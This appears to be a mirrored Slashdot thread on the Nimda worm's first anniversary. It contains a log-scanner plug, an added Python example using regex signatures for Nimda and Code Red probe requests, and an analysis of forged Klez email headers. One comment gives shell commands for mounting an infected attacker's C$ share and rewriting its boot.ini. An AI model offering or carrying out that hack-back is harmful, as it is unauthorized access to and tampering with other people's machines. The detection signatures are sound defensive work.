Slashdot Mirror


1 Year Anniversary of Nimda Outbreak

dots and loops writes "Today marks one year to the date that the nimda worm began making its way across the Internet." Hey, speaking of hilarious worms, I'm still getting 5-10 Klez viruses a day! Yay Security!

3 of 289 comments

  1. Still kicking by JediTrainer · · Score: 5, Informative

    If anybody is interested, I developed WormScan last year, which is a Java-based program (GPL) which can analyze your Apache log files for pretty much anything you want (just plug in your regular expressions). It detects Nimda and CR1+2 out of the box. It's easy to add your own entries to scan for.

    According to my logs (please be gentle), I was hit 650 times yesterday.

    Shameless plug, yes. But it does the job and the users of WormScan seem to be pretty happy with it, judging from the emails I've gotten so far.

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
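
A regex-signature scan of Apache access logs of the kind described in the comment above, as an added Python example that is not WormScan's code and not part of the original comment. The signature patterns, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Signature table (name -> regex on the request path), using the widely
# documented probe shapes of each worm. Extend it with your own entries.
SIGNATURES = {
    "CodeRed": re.compile(r"^/default\.ida\?N{20,}"),
    "CodeRedII": re.compile(r"^/default\.ida\?X{20,}"),
    "Nimda": re.compile(r"/(?:root|cmd)\.exe\?/c\+", re.I),
}

# Apache common/combined format: host ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*" (\d{3})')

def classify(path):
    """Return the name of the first matching signature, or None."""
    for name, rx in SIGNATURES.items():
        if rx.search(path):
            return name
    return None

def scan(lines):
    """Count hits per worm and per source host; list probes that got a 2xx."""
    per_worm, per_host, served = Counter(), defaultdict(Counter), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line
        host, path, status = m.groups()
        worm = classify(path)
        if worm is None:
            continue
        per_worm[worm] += 1
        per_host[host][worm] += 1
        if status.startswith("2"):  # the server answered the probe: investigate
            served.append((host, worm, path))
    return per_worm, per_host, served

# Constructed sample lines (documentation IP ranges, invented timestamps).
T = "[18/Sep/2002:09:14:02 +0100]"
SAMPLE = [
    f'192.0.2.10 - - {T} "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284',
    f'192.0.2.10 - - {T} "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301',
    f'198.51.100.7 - - {T} "GET /default.ida?{"N" * 224} HTTP/1.0" 404 276',
    f'203.0.113.5 - - {T} "GET /default.ida?{"X" * 224} HTTP/1.0" 404 276',
    f'203.0.113.9 - - {T} "GET /index.html HTTP/1.1" 200 1043',
    "not a log line",
]
```

Calling `scan(SAMPLE)` returns the per-worm totals, a per-host breakdown for reporting infected sources, and the list of probes that received a 2xx status.
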
  2. Still getting hit by rossz · · Score: 5, Informative

    No doubt in celebration of the birthday, I got a number of nimda hits this morning.

    mount -t smbfs password= //xx.xx.xx.xx/C$ /mnt/dork
    vi /mnt/dork/boot.ini

    Change the boot delay to some huge number and the boot message to "Run a virus scanner, asshole".

    umount /mnt/dork

    --
    -- Will program for bandwidth
  3. Re:How to block Klez emails from my mailbox? by Draoi · · Score: 4, Informative
    Replying to the senders (the From: address) won't work, 'coz it's forged. Klez pulls email addresses from the victim's address book/inbox and uses them for the 'from'. You have to look deeper into the headers to find the culprit.

    Here's one I just got;

    From: webmaster <webmaster@msn.com>
    Date: Wed Sep 18, 2002 15:03:16 Europe/Dublin
    To: webmaster@christymoore.net
    Subject: User code here
    Return-Path: <tony_XXXXXXXX@oceanfree.net>
    Received: from bubble.oceanfree.net ([212.2.162.35]) by ddandd.com (8.11.6/8.11.6) with ESMTP id g8IEADp05002 for <webmaster@christymoore.net>; Wed, 18 Sep 2002 15:10:13 +0100
    Received: from [193.203.147.182] (helo=Qrxy) by bubble.oceanfree.net with smtp (Exim 3.33 #3) id 17rfQB-0002p3-00 for webmaster@christymoore.net; Wed, 18 Sep 2002 15:03:16 +0100
    Mime-Version: 1.0
    Content-Type: multipart/alternative; boundary=Z0z7O8r66243H01338eADBxj05jJ7LLMnHZ85
    Message-Id: <E17rfQB-0002p3-00@bubble.oceanfree.net>
    Status:
    Attachments: There is 1 attachment
    Do you think this was sent by webmaster@msn.com? (I hear the jokes now!). In this case, the Return-path actually contained the victim's full mail address, which I've mercifully blanked ...
    --
    Alison

    "It is a miracle that curiosity survives formal education." - Albert Einstein